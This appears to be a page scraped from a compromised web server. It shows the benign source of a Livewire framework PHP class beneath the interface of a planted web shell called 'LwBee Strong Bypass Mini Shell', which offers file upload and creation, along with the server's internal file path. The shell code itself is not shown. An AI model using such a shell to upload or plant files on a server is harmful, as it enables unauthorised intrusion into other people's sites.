/home/storage/f/3f/a5/aloic1/public_html/core/vendor/livewire/livewire/src/CreateBladeView.php
<?php

namespace Livewire;

use Illuminate\View\Component;

class CreateBladeView extends Component
{
    public static function fromString($contents)
    {
        return (new static)->createBladeViewFromString(app('view'), $contents);
    }

    public function render() {}
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File